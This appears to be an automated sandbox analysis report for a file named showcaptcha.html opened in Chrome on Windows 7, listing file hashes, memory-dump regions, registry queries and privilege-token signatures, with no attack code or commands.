SHA512 3fc6201ed493834d0e819446dee27d5401bbf685edec8263f56155c1677140459b5aba0dff2623ede37d9ddfaab880acb4993a3c0bb710e48642f846deee07d9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0

MD5 cef4829a25a3d5029be0bce8165c63ab
SHA1 7f94caf2aad5ce3d4ab41bb7cd1a1327af8e9ac5
SHA256 b597deedfe81f634b954e9321d82473a3d83441f31fa72b89c0b6fc4c1e799a8
SHA512 0fc8dc2776c3afb8e971c95369dd22921b3a1be15fb66e5026d7714dff59cf3bc4770bc2dcf98904d67ddc2e522c31e685811ec6983c02110be32f1ce4dceb1d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

MD5 12cd2c677b92835a39d585a316b9898a
SHA1 bfd86ede520e0b1fbd13d22afe428ba755c357fc
SHA256 4ce3fead29636f59ca064f2185afc98505338bab8038a28a82b3f6aabbce861c
SHA512 60d4be10effd94231dbcb98740fa836d94f03e4bcb078c6aace19838c5c72ff283af4e8a55d46408b63efcc30fb11de2785e3763d3268df2bc7c6a8b4eea9744

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG

MD5 807aca9284159d9107457bc81d686949
SHA1 631f8195b3141d630c4be6d1c1544dd7b357067b
SHA256 0f84c6cb75eeb9e5a668b021c0461841f532aaa7bc7200c6f3ff173ecaba8f5b
SHA512 031f1f95f7e0598f70f81113b1858fda9c2e7c49228a159859768f2b377918152c5f01edb21e23b42336aec68ad172c3178f3ac893d6e21c1dc4a991af05be81

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

MD5 0951d27e7831f512f96e880cae60ce52
SHA1 b892bbf8da0e269207fe7794db31887df558c8f5
SHA256 9c07e3f6f849d4010585106f3974256fb69727d40de87999e33e9705657809cd
SHA512 ae7f2552a27e6f76264d6ffbb92e3460be83bc2badc129a87404852d6b736240881a87143d8d758893c9a98801223abb318c4416f7b96a75bb24525ee8dcfa16

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG

MD5 a83a8682a4089d550d1a723e08d5b095
SHA1 eec441ddb5064ba3983d394e9aac9b44c9f127ad
SHA256 269d97e02f633c41e7ec43042b05232d4fcba7aa5154324977b3b553dacdd652
SHA512 e053dc90ba2c943baf21fed1a3a4616439aa9ce9906587672fba40b4eb6957590e25abc96334416a7019e9ca81d0c69a3900f79ff235beeb9341c8cdccedc911

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

MD5 20266f389ea46a194c3bc75f05420e74
SHA1 d635f44e012fe7cbb4fe1b6d6cb561c015a36276
SHA256 a8fc723604ef1ff95480b7f642c4e0ad37efa5a184e74b649c5c4471505002c7
SHA512 491cc3d30da7b03f8fbf2fd846bceaa3e4c669d367221895921da321ffe6020a176074e926ed480ef8e60c6ef17446ac261441aaf8ef1b7055ca36e403dc6a79

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG

MD5 582fa1cde7f2531c5e432e4c2d83db8e
SHA1 b28efa4f09aa6061ff911344b34b6ed8b5d7ff94
SHA256 14003b86f26e5a109a93122aea78e042dd6c14b2ddddf0791f8b8c608a3b0a22
SHA512 9c4552d680953b1ad45c826de169eae6f7e04c1f653bfeced6cf564236570556db6e92353bb4ec5c916b79c92fe315fddd497a341c1795969a09249608d960ec

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG

MD5 3298171fdde2685732832d3150479d95
SHA1 23e601a817f7646af335ecd5fcb58e8e757ab717
SHA256 422df8332671d042c8cd74821f2416567447649aae3096c455999779df1c00d6
SHA512 480198ca71a8a916630f740c2f651c315008367980f4dacf602017f74eb44c90a901f0e308efafd44393da855bb7a8e4a77dee1139f0fe983a8770fd3fee6db0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log

MD5 a7a74f471c2c6198b6a0dbd0a6949e7c
SHA1 d99328ce8b8d12e6c1f89c1cda17ce08bb929d0f
SHA256 f1a4db02798117673aece1effa0bff11734ac695b9c2bcbbe5487e222dbb26ae
SHA512 9fed5f71856f29468f83f92f6f0d587e58ba5f1e5b86a1da1ab2df88d439e112f0b2bd42acaef5024ec329857e1eac806702f3f6589fbe62aaebb0147fd6c5ed

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG

MD5 738db81655d953caac2e66f89d14eccd
SHA1 c03b0b7aae5cfb67dfea553ac9e7b34be86874f2
SHA256 2e890e4051c252fb765ebee8915d1dc340c8d9d0a6810c271e181ce98a55aefa
SHA512 e4f2e74223f15962d882e239003aa5db7300d1d20454d43612eecad113a656eebb677cc296202e474e8c730d53007a47af4d6a973848b84d725884267fa963dd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1

MD5 b5ee5d5bacc2c609e4d747d8deff27fa
SHA1 6df39710d8e202a5ec80a5381c1533138641452e
SHA256 bd9e9f5a832e4258e52dc1a24e692df59bccd78522ec827a8ba9a782e96e9eae
SHA512 6714dd94e439d0367e0b666e525bdccef0b180be5119c71089ff9b33d8e937863753f675a75308b620514b476d971855df7b4f31cc29248c2e9489208e71124b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0

MD5 6010cdf5aab910daa0d5a1def355dae8
SHA1 b2488e9276466ab46c76a17c155b0ba51416c6df
SHA256 2529c6c49e8cccf5593edcde49095761d23821e7f78ae0f779f8aba2a94c715b
SHA512 dd53f971dc18d28b7ec169cadf8d2b1a752639d50928bd3506bdb5357b3c6a8437d1ed961654c969e9f71ab480e7013e3f586cdbb61e08589b775825ce329155

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

MD5 9eae63c7a967fc314dd311d9f46a45b7
SHA1 caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf
SHA256 4288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d
SHA512 bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13363112885839287

MD5 f11dd29351bd9df188112df752d2d388
SHA1 32bbff9d52187975a3137f03e904573356342b08
SHA256 9ae380598c28b710f8ee591a7ed8e6bcc16ad94506ade37933cea13a23d7deff
SHA512 8d6b556826be567451e2ca2a7e175a22ab8150d87038e3fdf94c6d893d98b776e15d0ebdc3a774095fca49350ad783a6eef1f793cb2df193a5820afdc72b006a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt

MD5 9930ba5d7db5ece9a9de081280027f7e
SHA1 6bc4cd2654975f1626072875852822dfbb749363
SHA256 1ee215fbdecaf1b86df1e09bf81f8c821c406055346d8fdeac40ebb1511737ed
SHA512 82bb99ac19c6028ed61f0ea1e1246b4cc6faab78780dd17923b6b88c02cf9f0789a81b9d5218d2e1e0d182358abb808d7de2d9828cc5a10c3c578917968a9fd8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Browser

MD5 de9ef0c5bcc012a3a1131988dee272d8
SHA1 fa9ccbdc969ac9e1474fce773234b28d50951cd8
SHA256 3615498fbef408a96bf30e01c318dac2d5451b054998119080e7faac5995f590
SHA512 cea946ebeadfe6be65e33edff6c68953a84ec2e2410884e12f406cac1e6c8a0793180433a7ef7ce097b24ea78a1fdbb4e3b3d9cdf1a827ab6ff5605da3691724

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG

MD5 6e98714162de535445ce3590fa372955
SHA1 3e2692ed7f51cc59fb9f57c8f395e6b3318e3d6b
SHA256 1c6c3c3a711cb35c789ef9e1eeb4a9374cd0b5cae784632026d5e822026f8fc3
SHA512 c4068e14913a45f5c8410fa118432781cf2dccf1e1436a81f8e370b2177e2fa0f40c0a8327c7a6daf54fa8659f3b891eba8ee0b6e8357e474b293584b16d1d9e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 3145ee8a244daa694367d6713a286e81
SHA1 bb2a32c8887c6aac25b85d11d61e0e694284fbca
SHA256 7d17b9c051d7e15b33c7a4be12c8426300700cb620d7143e850d642c12c2314f
SHA512 ad7ab86d93fc740b4d7aed877513da38d6baa97fe6a3ee3ba3c24bd901e6cad14149d7623633ed1bafad87ff8a1d6df07654c4c96768c7085c886a86fc871925

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 e6019f8516994d56ea6f01b8761b7f8b
SHA1 be436e1254c4518b8a6b3216ab6959ca0a4cf65c
SHA256 71860318bb9f3df4622050543fd3fb3644e81bca069c6e8329e5ba72f9277bd1
SHA512 0828e9d4b73cf5e6ab722e9cff3485427dd6a6899d966adbca16770a30ea964c53d9476151971c35a63349ee21d4d3742a10e1e3d6e08e1f1042f6071211a3ca

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History-journal

MD5 e1a004267b1438dc93b957de961ea579
SHA1 c07e909fb0993e222720a6003c017cacc33bc397
SHA256 0fd8cd9d11bcf2572c8b69196812e580f572b9b9d54e9d04477dd4007f89ea8a
SHA512 fb2fa3f696c93e01ffe942d4abf03dee8ec4e4c868f1b04d828a4290afdc3bd39fa8241a1cffb8783350431eaff5d1f713147b4f04fbdd55d0b33cef8a52f26a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 33573050f4244e118665a9d804a3aa0f
SHA1 186c53a0984ef5f0b795aacd678b7c4936c573f5
SHA256 cbb0b5b4db91e0e1f9d4c28234a33ae7a84e57c231efcf048568bb260cfdc2ef
SHA512 9dc5f8076a8d9be4dd07568d9a3ac69a7a877c473aa324fe8c8d773a0cb798e03d63f8e7e990a98b51df23d932f8ae2f8e21205f757a998231265993e7754e25

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\t\Paths\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager

MD5 6ef927bcaaadf20eddf2e015325d780d
SHA1 91b32239d2f0774a56c73b31861c0ec1c2b64fff
SHA256 7ae78cd634c19bf3e33f8cdc6b3b135d6a41be5a348c72e5d75586325b590c16
SHA512 740d9d374a57066964c81a902d30685e610664cb493b6892a0122368440864bec7647a08f0270295743c5aa198a474aeb8d0763f2bbaa2fff7fa67d951215f11

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db

MD5 89f95cba7df4701a8173efa00dd6b94c
SHA1 673fbd9811b91813675b1f2a42cc8bd96450a0a2
SHA256 7334dd817408a2ad18d3ffd643e1707504159d52daef7c280db4f14d9c719129
SHA512 9cb34878f8fa559d0ee1ee637218df7763f33aaf44c7aa01f40709e0c7ec74a131dbd9b96c14c845ce29d665bb97c077e81a24bd6b8a797fd306678a15820deb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\WebStorage\QuotaManager-journal

MD5 4f0a6f3d8cd9dab2541cd302235c62df
SHA1 ae18afaa569a220486cd50268bb525edb741729f
SHA256 38f2496603cf90a258b2906c075558d3aa8cf4b5992277e1650f13309c208741
SHA512 fd582fada2165f968da85da12306470d9923f067e515f1390a093401f737ecddd8d5fb23d6e32402bebab0c207dfb9a076a72d2df657360e8a425bb951d07569

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d2be120682800dbbe5884f30408cc983
SHA1 489b6251f3fb4670fc53d9c658b6fc39c8509728
SHA256 bfa826d493e89ebc2c76306089c7467721789a4c83f1c11a3a403f338232118e
SHA512 e451df86f02203cdad3e349a715d0c12636f09b331795e515704d624a578935c2ec964c2f33efd8383ba219b915a358515768d6425d6397ceee7949a3cc409f4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 1c72a7ac1af0b14826a00e33bafde7a6
SHA1 12c5352cfd24ef58e6a84357eba7b538c1df53a6
SHA256 b9fed1a18b60a62202e44e523daf52951ad98cf64bd3731b55c0c28e17a67b62
SHA512 f4178ef1489b39a1082ed7a55ddb7e9bbf51a45b7b14a7c9216c785a72a92ba55355532ff14efef2b025bb9c74668ef1ee4a80653789180b8210c14c9177cdce

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 da2b30d98e48b113cfeeb8fabc76de32
SHA1 db7e382ac5b25c575cb700a873e035c9c0b45636
SHA256 7fa7f6c2afdb7009ea68b665130a973ab01ee515a92ebadcaaa78a873840386f
SHA512 de4d8d5ef74cebe41b92f56711289c2549c39c562cb8406836c08442be95f85ad2fd9d0e345ba5dad1f0517e3a3b0935aed33e4078126ab3c012a5a38cf1a9ee

C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 9b22c1761d11628916c2b9d15005700a
SHA1 c4eb26207dc71f457ac3ad1c6cdfb6632b790168
SHA256 0f94e385646e2f7dd69844e27ade0cf65e0cd5633b21f84754802325a84493a9
SHA512 7592394db141c5b8afb973e3ec29f736ced19cf4abdc342f900f396aefb697587cfddd6605e580803d11365287b62acbbb64834e1f49c9adde661d964db2436d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 3e841d301eacc5f9338c34c60fbd7847
SHA1 fd7aa304e20ef8f6440fcd4f09480b5d052e6f93
SHA256 4e97cad69cafd284cf5f4d1408e4526303f0b5d77c7f0ef20026b7b3edfff03d
SHA512 672c0157d83c4d0472329a1595e5d081c29084d30cfac247e911aa2d066a7e1df94d9204cb9604953017a5277772e885438a886fd3b7ab0c20c93550f41c4645

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe643346.TMP

MD5 4d9b2070aeeabdfcee1ca2cb5534b25a
SHA1 841bc60e9cbe3acc4f1eef72e4f7ced4e3fb51c0
SHA256 875a0b3ff9a1098f889bcec24d0b0cdad0f4f194044d9378bbbcf6dbf730b439
SHA512 0101f776fda291397b39ade301a3a644498c5904fbf63cc51fbd1a43f6f15b0fd7859fd765c0c144c74a273f77baed3a730387550778515a986de37d5c7f1686

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 2b776fdf97ad9656dad0d0f3d7928fa7
SHA1 e993fd131bd43fa0d275c50c3227d2aa46fbae01
SHA256 b7051bab8dcc733fb0d10cfe4ab29a0a8c5aa4bf2cab8f50210bb8455859dbaa
SHA512 8f53e85f6d476aa390e2e8a4749b48364ae15227f28cc8d33530969003f0057187f6029e4ce03ba4f299bcbfad5d9bfa189cf089f75f1785a4801fbe7591f3d2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 64a811ea188a2ee20a329af872a81822
SHA1 68ef3f662d4e0f37ceeea1a799f4d569dd1afa4d
SHA256 8b6a7388355a72fbbd769d06de1be6c9882ce5a4b32bfeb1ea90a3480397db6b
SHA512 6ea2a39f2fbe3f7420fb99638fe794ae49e6053e6d951bf962120494c652e29e9ce61c639d64dbc7dcbb931dc1ea6f105f7fd8316e610339020778caa0141e0f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe64470c.TMP

MD5 c0db1f14caa60567f7c96f0525f3a19e
SHA1 e093fac5c366645bf755e79abbee0abecb314988
SHA256 19e7569160d7ca4dd724d3190ed90615ef181925365f66fb3f319ec49a708120
SHA512 5b7abb0fe91ac98920588e2228c2de20f51f9c6090df65b41eaca721635512a0cc5935076b3ba2aea9c80a6f36aad509a652120a9ce95a8238ab4c90aa8038fb

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 29475beca5ea9ec84a07e3d16bb2b181
SHA1 6e4cc22bf656c95962037ba9631cb3ad61eacd06
SHA256 3314548c31cbd27f9309c9b45f3755bf8c7fa0a06a42797031b1328264818bf4
SHA512 18f21f6f4e142c44fc55c010011f0623ed673be1cc11ef7a85b63d9b13b3f56e7ad5dc3497cfe84434ca8709479ff0c3f90441d2cf0c839c128bea4aac105049

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 23dc6dfae8b595aa58bcafd55b7d9786
SHA1 bcf0e1d32eb4ab19275acebb4075666b7e64ad9c
SHA256 cbbf0b410466211b66b682dc33b3fb356c9fcf515821caddf55879d34c11e083
SHA512 651c43d272b013e33830d8ee08c1295b8d8621a40cfa49c590eed6b4ade4b63f73388d1f9390264a35ea96883a547dc3ee2762ad32392341fa6c5079ea325bf5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 3687f5e5a1b35e06dce5187f49b2d97a
SHA1 b55a3c6b1dc4c7ce887d179490afc11faa36f950
SHA256 0b32b8715f52ddab9c34161b70c9786dbdafa1f171b76ad10b6316941eccf693
SHA512 b76c7dacba9afc02b6ab3ca6a2a8ed2ddf9485695b6f286e13e16747cb58cf4a88b51a3a6094a16973687c14209690d79ae744c93aeb27fed06b7592f9e37f9a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 3ceb9c696c6f62db27c063809b772019
SHA1 8c9a9b81f8b6ef5d72e8a967c6c022c0b4855c68
SHA256 fb0567fcdbf62ffbfb3d3afc691677391f0af1f9c737a329603036732021e2e9
SHA512 a0708ee9fae42113979c1c9500b1b906eca5dfcd7ef637e8159a6aec5b4ab3aa37085d351bbba7a60830f634fc88d03927405ba7efde06cd3588bba6add5517f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7983ae9b26b807fb0221ce2698548f54
SHA1 9cb394c6288c334446aa7b6de0e5a69c676cfb6f
SHA256 c3cad9760e794b885bf3b71403fb321c76d2aab0edae0be6495eaeb469904ac4
SHA512 e144e4ea22b0198f306fd1a4985c18474025bd64da8edb7794a691f07d28060d15658cf659c7245f3dff134a9e929cb3a76030ed56b76bc017d493fd2d02b05c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 bbb132cda0f2c74aa6850fca6ae2e1cc
SHA1 bb11cb7556a8ff1b9b2bd99d83248ced670283bf
SHA256 d2b61cb08a03a9bd1176914a012b727dec86e04fa02d21c6456156e0e4e20c64
SHA512 c2ce5727e2acb451479abeb6f147ba17bc6fe1d69f9f7d3e2fd3a41a031f2252f4e28db40eeee1f2a426b64def3554beecd817893c8383c29480d27dd03580a7

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rlw20jp3.d1m.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5524-1870-0x000001D721FF0000-0x000001D722012000-memory.dmp

memory/5524-1878-0x000001D722520000-0x000001D722564000-memory.dmp

memory/5524-1879-0x000001D7225F0000-0x000001D722666000-memory.dmp

memory/2972-1899-0x0000000002940000-0x0000000002976000-memory.dmp

memory/2972-1900-0x0000000005160000-0x0000000005788000-memory.dmp

memory/2972-1901-0x0000000005050000-0x0000000005072000-memory.dmp

memory/2972-1907-0x0000000005800000-0x0000000005866000-memory.dmp

memory/2972-1908-0x00000000058E0000-0x0000000005946000-memory.dmp

memory/2972-1913-0x0000000005950000-0x0000000005CA4000-memory.dmp

memory/2972-1914-0x0000000005F20000-0x0000000005F3E000-memory.dmp

memory/2972-1915-0x0000000005F70000-0x0000000005FBC000-memory.dmp

memory/2972-1917-0x0000000007770000-0x0000000007DEA000-memory.dmp

memory/2972-1918-0x0000000006460000-0x000000000647A000-memory.dmp

memory/2972-1926-0x0000000004C40000-0x0000000004C48000-memory.dmp

memory/2972-1928-0x0000000004CB0000-0x0000000004CB1000-memory.dmp

memory/4336-1931-0x000002F2D06F0000-0x000002F2D06F1000-memory.dmp

memory/4336-1930-0x000002F2D06F0000-0x000002F2D06F1000-memory.dmp

memory/4336-1929-0x000002F2D06F0000-0x000002F2D06F1000-memory.dmp

memory/4336-1936-0x000002F2D06F0000-0x000002F2D06F1000-memory.dmp

memory/4336-1941-0x000002F2D06F0000-0x000002F2D06F1000-memory.dmp

memory/4336-1940-0x000002F2D06F0000-0x000002F2D06F1000-memory.dmp

memory/4336-1939-0x000002F2D06F0000-0x000002F2D06F1000-memory.dmp

memory/4336-1938-0x000002F2D06F0000-0x000002F2D06F1000-memory.dmp

memory/4336-1937-0x000002F2D06F0000-0x000002F2D06F1000-memory.dmp

memory/4336-1935-0x000002F2D06F0000-0x000002F2D06F1000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-17 15:47

Reported

2024-06-17 16:17

Platform

win7-20240508-en

Max time kernel

128s

Max time network

1798s

Command Line

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\showcaptcha.html

Signatures

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
